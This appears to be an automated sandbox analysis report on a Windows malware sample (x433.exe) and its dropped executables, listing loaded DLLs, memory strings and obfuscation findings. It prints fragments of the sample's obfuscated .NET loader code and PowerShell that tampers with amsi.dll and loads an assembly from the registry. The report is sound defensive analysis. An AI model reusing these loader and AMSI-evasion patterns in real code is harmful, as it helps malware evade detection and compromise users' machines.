Source: C:\Users\user\Desktop\x433.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\x433.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: x4usb.lnk.2.dr LNK file: ..\..\..\..\..\..\Local\x4usb.exe
Source: C:\Users\user\Desktop\x433.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: x433.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: x433.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($JhuBDoUfjiRKob,$tYvGzbpkOpfGRXdvJJH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$nrzKdroJBYOrdatEY=$VrBFKSFCQkTmpL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](120)+''+'4'+''+[Char](115)+''+[
Obfuscated command line found
